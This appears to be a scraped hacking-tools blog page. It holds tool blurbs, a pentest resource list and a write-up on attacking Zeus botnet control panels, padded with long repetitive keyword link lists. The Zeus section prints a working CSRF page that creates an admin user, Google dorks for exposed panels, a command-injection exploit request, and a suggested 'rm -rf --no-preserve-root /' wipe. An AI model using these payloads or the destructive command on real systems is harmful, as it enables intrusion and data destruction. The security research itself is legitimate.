segunda-feira, 5 de junho de 2023

DirBuster: Brute Force Web Directories


"DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these. However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;) " read more...

Download: https://sourceforge.net/projects/dirbuster

Related articles

Learning Resources For Hacking And Pentesting


In this article, I'm going to provide you a list of resources which I have found very useful. I don't remember all of them from top of my head so I might miss some. This list will be updated on usual basis. Hope you'll find some good stuff to learn. If you have got suggestions leave them down below in the comments section.

Free Hands on Labs:

1. Hack The Box - live machines to hack your way around. Besides boxes they have awesome challenges and great labs to try out.
2. TryHackMe - great way to learn pentesting while doing it. Lots of machines to hack and lots of ground to cover.
3. Portswigger Web Security Academy - learn web application pentesting.

Free Training (Mostly Introductory stuff):

1. Tenable University - training and certification on Nessus etc.
2. Palo Alto Networks - Palo Alto Networks offers an abundance of resources to prepare for there certifications. The training is free but the exams cost.
3. Open P-TECH - has an introductory course on Cybersecurity Fundamentals.
4. IBM Security Learning Academy - has many courses but focused on IBM security services and 
products.
5. Cisco Networking Academy - not all courses are free but Introduction to Cybersecurity and Cybersecurity Essentials are free.
6. AWS Training and Certification - has some free cloud security training courses.
7. Metasploit Unleashed - Free Online Ethical Hacking Course - Offensive Security's free online course on metasploit.
8. Coursera and Edx - you already know about them.

Blogs:

1. HackTricks - This is simply an awesome blog just visit it and you'll fall in love.
2. pentestmonkey - I visit it most of the time for one-liner reverse shells they are awesome.

Writeups:

1. 0xdf

YouTube:

1. ippsec - an awesome YouTube channel with tons of information in every video. New video comes out weekly as soon as the machine on hackthebox expires. https://ippsec.rocks for video searching
2. xct - short walkthroughs on hackthebox machines.
3. Cristi Vlad - advice and content on pentesting and python.
4. LiveOverflow - reverse engineering on steroids.
5. SANS Pen Test Training - SANS institute webinars and talks.
6. VbScrub - great pentesting videos.
7. BinaryAdventure - great pentesting and reverse engineering videos.
8. GynvaelEN - great videos and talks about CTFs and pentesting.

GitHub Repos:

1. PayloadsAllTheThings - heaven of hackers.
2. Pentest Monkey - reverse shells and more.

Related posts


  1. Hack App
  2. Hacking Tools Free Download
  3. Hacking Tools For Windows Free Download
  4. Pentest Tools Windows
  5. Pentest Tools Url Fuzzer
  6. Nsa Hack Tools Download
  7. Pentest Tools Free
  8. Hack Tools For Windows
  9. Pentest Tools Apk
  10. Pentest Automation Tools
  11. Pentest Tools Review
  12. Hack Tools Online
  13. Hacking Tools Hardware
  14. How To Install Pentest Tools In Ubuntu
  15. Hackers Toolbox
  16. Hacking Apps
  17. Nsa Hacker Tools
  18. New Hack Tools
  19. Pentest Tools Apk
  20. Pentest Tools Review
  21. Hacking Tools For Windows Free Download
  22. Pentest Reporting Tools
  23. Pentest Tools Find Subdomains
  24. Pentest Tools Kali Linux
  25. Hack Tools For Windows
  26. How To Make Hacking Tools
  27. Hack Tools For Windows
  28. Hack Website Online Tool
  29. Hacking Tools Kit
  30. Game Hacking
  31. Pentest Tools Github
  32. Hack Tools For Mac
  33. Pentest Box Tools Download
  34. Hacking Tools For Kali Linux
  35. Hacking Tools Hardware
  36. Pentest Tools Nmap
  37. Hacking Tools Download
  38. Hacking Tools And Software
  39. Pentest Reporting Tools
  40. Hacking Tools Online
  41. Hacking Tools
  42. Hacking Tools For Mac
  43. Tools 4 Hack
  44. Hacking App
  45. Pentest Tools Github
  46. Hacker Tools Online
  47. Pentest Reporting Tools
  48. Hacker Tools Software
  49. Pentest Tools Windows
  50. How To Hack
  51. New Hack Tools
  52. Hack Rom Tools
  53. Hack Tools Online
  54. Pentest Tools For Android
  55. Pentest Tools Windows
  56. Nsa Hack Tools
  57. Hacker Hardware Tools
  58. Hacking Tools 2019
  59. Hacking Tools Kit
  60. Kik Hack Tools
  61. Tools For Hacker
  62. Hacking Tools Usb
  63. Pentest Tools Website
  64. Computer Hacker
  65. Usb Pentest Tools
  66. Hacker Tools 2020
  67. Hacking Apps
  68. Pentest Tools Port Scanner
  69. Hacking Tools Mac
  70. Tools Used For Hacking
  71. Pentest Tools Download
  72. Underground Hacker Sites

domingo, 4 de junho de 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More articles


  1. Nsa Hacker Tools
  2. Hacking Tools For Games
  3. Top Pentest Tools
  4. Hacker Tools Software
  5. Hacking Tools For Beginners
  6. Hack Tools Pc
  7. Hack Tools Mac
  8. Hacking Tools For Mac
  9. Hack Tools
  10. Hack Tools For Windows
  11. Bluetooth Hacking Tools Kali
  12. Hacker
  13. Hack Tool Apk No Root
  14. Pentest Tools Github
  15. Pentest Tools For Mac
  16. Hacking Tools Download
  17. Computer Hacker
  18. Underground Hacker Sites
  19. Hack Tools For Games
  20. Underground Hacker Sites
  21. Best Hacking Tools 2020
  22. Hacker
  23. Hacker Security Tools
  24. Tools Used For Hacking
  25. Pentest Tools Find Subdomains
  26. Tools Used For Hacking
  27. Pentest Tools Free
  28. Wifi Hacker Tools For Windows
  29. Hacker Tools 2020
  30. Pentest Tools Github
  31. Usb Pentest Tools
  32. Android Hack Tools Github
  33. Hacker Tools Windows
  34. Hacking Tools Windows
  35. Ethical Hacker Tools
  36. Top Pentest Tools
  37. Hacking Tools 2019
  38. Hacker Tools For Mac
  39. Pentest Tools Open Source
  40. Github Hacking Tools
  41. Hack Tools Download
  42. Hacking Tools Free Download
  43. Hacker Tools 2020
  44. Hacker Tools
  45. Hacking Tools For Games
  46. Hack App
  47. Hack Tools Mac
  48. Hacking Tools Software
  49. Install Pentest Tools Ubuntu
  50. Hacks And Tools
  51. Hacking Tools For Windows 7
  52. Hacking Tools Download
  53. Nsa Hacker Tools
  54. Easy Hack Tools
  55. Hacking Tools For Windows 7
  56. Game Hacking
  57. Tools 4 Hack
  58. Hacking App
  59. Pentest Automation Tools
  60. Hacking Tools For Windows Free Download
  61. Hacking Tools 2019
  62. Hacking Tools
  63. Hacking Tools For Kali Linux
  64. Game Hacking
  65. Best Pentesting Tools 2018
  66. Pentest Tools For Mac
  67. Hacking Tools For Windows
  68. Hacking Tools Download
  69. Pentest Tools Download
  70. Hacker Tools Windows
  71. Hacker Tools List
  72. Hack Tools For Windows
  73. Hacker
  74. Pentest Tools Port Scanner
  75. Hacker Tools For Mac
  76. Github Hacking Tools
  77. Pentest Tools Android
  78. Hacking Tools Pc
  79. Hacking Tools Github
  80. Growth Hacker Tools
  81. Hack Apps

OSWA™


"The OSWA™-Assistant is a self-contained, no Operating System required, freely downloadable, standalone toolkit which is solely focused on wireless auditing. As a result, in addition to the usual WiFi (802.11) auditing tools, it also covers Bluetooth and RFID auditing. Using the toolkit is as easy as popping it into your computer's CDROM and making your computer boot from it!" read more...

Website: http://oswa-assistant.securitystartshere.org

Related word
  1. Hacking Tools Download
  2. Computer Hacker
  3. Tools Used For Hacking
  4. Hack Tools Online
  5. Hacker Tools For Ios
  6. Nsa Hack Tools
  7. Hacker Tools For Pc
  8. Hacker Techniques Tools And Incident Handling
  9. Hacker Tools List
  10. Pentest Tools Free
  11. Tools 4 Hack
  12. Growth Hacker Tools
  13. Pentest Tools Url Fuzzer
  14. Hacking Tools For Kali Linux
  15. Pentest Tools Alternative
  16. Best Hacking Tools 2019
  17. Hacker Search Tools
  18. Nsa Hack Tools
  19. What Is Hacking Tools
  20. Nsa Hacker Tools
  21. Wifi Hacker Tools For Windows
  22. Hacker Tools Mac
  23. Hacker Techniques Tools And Incident Handling
  24. Pentest Tools Url Fuzzer
  25. Hacking Tools Download
  26. Hack Tools For Mac
  27. Best Hacking Tools 2019
  28. Hacker
  29. Hacker Tools Github
  30. Hacker
  31. Hack Tools Pc
  32. Pentest Box Tools Download
  33. Pentest Tools Windows
  34. Hack Tools For Mac
  35. What Are Hacking Tools
  36. Hack Tools Online
  37. Hacker Tools Apk
  38. Hacker Tools Linux
  39. Termux Hacking Tools 2019
  40. Easy Hack Tools
  41. Pentest Tools For Ubuntu
  42. Pentest Tools Tcp Port Scanner
  43. Hack Tools 2019
  44. Hack And Tools
  45. Kik Hack Tools
  46. Hacking Tools And Software
  47. Pentest Tools List
  48. Computer Hacker
  49. Pentest Tools Framework
  50. How To Install Pentest Tools In Ubuntu
  51. Hack Tools For Pc
  52. Hacking Tools For Pc
  53. Pentest Tools For Ubuntu
  54. Hack Tools For Pc
  55. Hack Tools 2019
  56. Pentest Automation Tools
  57. Hacking Tools Name
  58. How To Make Hacking Tools
  59. Computer Hacker
  60. Hacking Tools Windows
  61. Hack Tools For Mac
  62. Best Pentesting Tools 2018
  63. Hack Tools 2019
  64. Hacker Tools Online
  65. Install Pentest Tools Ubuntu
  66. Hacker Tools For Windows
  67. Pentest Tools Online
  68. World No 1 Hacker Software
  69. Pentest Tools Github
  70. Hacking Tools Usb
  71. Hacking Tools Kit
  72. Hacking Tools Software
  73. Pentest Tools Alternative
  74. Wifi Hacker Tools For Windows
  75. Hack App
  76. Pentest Tools
  77. Hack Tools Pc
  78. Hacking Tools Download
  79. Hacker Tools 2020
  80. World No 1 Hacker Software
  81. Pentest Tools For Mac
  82. Hacker Tools Apk Download
  83. Hacker Tools 2019
  84. Blackhat Hacker Tools
  85. Best Hacking Tools 2019
  86. Wifi Hacker Tools For Windows
  87. Hacking Tools Mac
  88. Kik Hack Tools
  89. Hacking Tools Download
  90. Hack Tools
  91. Hacker Tools List
  92. Hack Tools Mac
  93. Pentest Tools Website
  94. Hacker Search Tools
  95. Github Hacking Tools
  96. Pentest Tools Github
  97. Termux Hacking Tools 2019
  98. New Hacker Tools
  99. Pentest Tools Bluekeep
  100. Bluetooth Hacking Tools Kali
  101. Hacking Tools For Windows Free Download
  102. Pentest Reporting Tools
  103. Hacker Tools 2020
  104. Hacking Tools Software
  105. World No 1 Hacker Software
  106. Hacker Tools For Mac
  107. Hack Tools Online
  108. Hacking Tools Online
  109. Pentest Tools Review
  110. Pentest Tools Apk
  111. Ethical Hacker Tools
  112. Hack Tools Pc
  113. Hacker Tools Github
  114. Hacking Tools Windows
  115. Hacking Tools